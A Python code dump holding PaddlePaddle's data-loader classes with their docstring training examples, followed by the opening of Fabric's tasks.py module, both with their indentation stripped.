# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
tasks.py
|
from __future__ import with_statement
from functools import wraps
import inspect
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, normalize_to_string, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
.. versionadded:: 1.1
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
